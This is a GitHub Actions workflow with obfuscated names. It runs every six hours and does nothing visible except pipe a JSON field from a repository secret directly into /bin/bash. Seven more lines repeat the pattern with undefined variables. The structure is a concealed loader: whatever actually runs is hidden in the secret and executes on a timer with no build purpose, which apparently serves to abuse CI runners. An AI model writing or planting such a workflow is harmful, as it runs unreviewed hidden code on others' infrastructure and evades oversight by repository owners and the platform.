name: termsphonetic
on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: termsphonetic
        env:
          kpmx0: ${{ secrets.kpmx0 }}
        run: |
          echo $kpmx0 | jq -r .rvrc2066 | /bin/bash
          echo $qux1 | jq -r .nrk82 | /bin/bash
          echo $klmj8 | jq -r .w61 | /bin/bash
          echo $aecvh61344 | jq -r .zr6 | /bin/bash
          echo $hsag2 | jq -r .rd95 | /bin/bash
          echo $eb61789 | jq -r .a58266 | /bin/bash
          echo $xy51 | jq -r .stvdb6 | /bin/bash
          echo $zfne127 | jq -r .yb57613 | /bin/bash

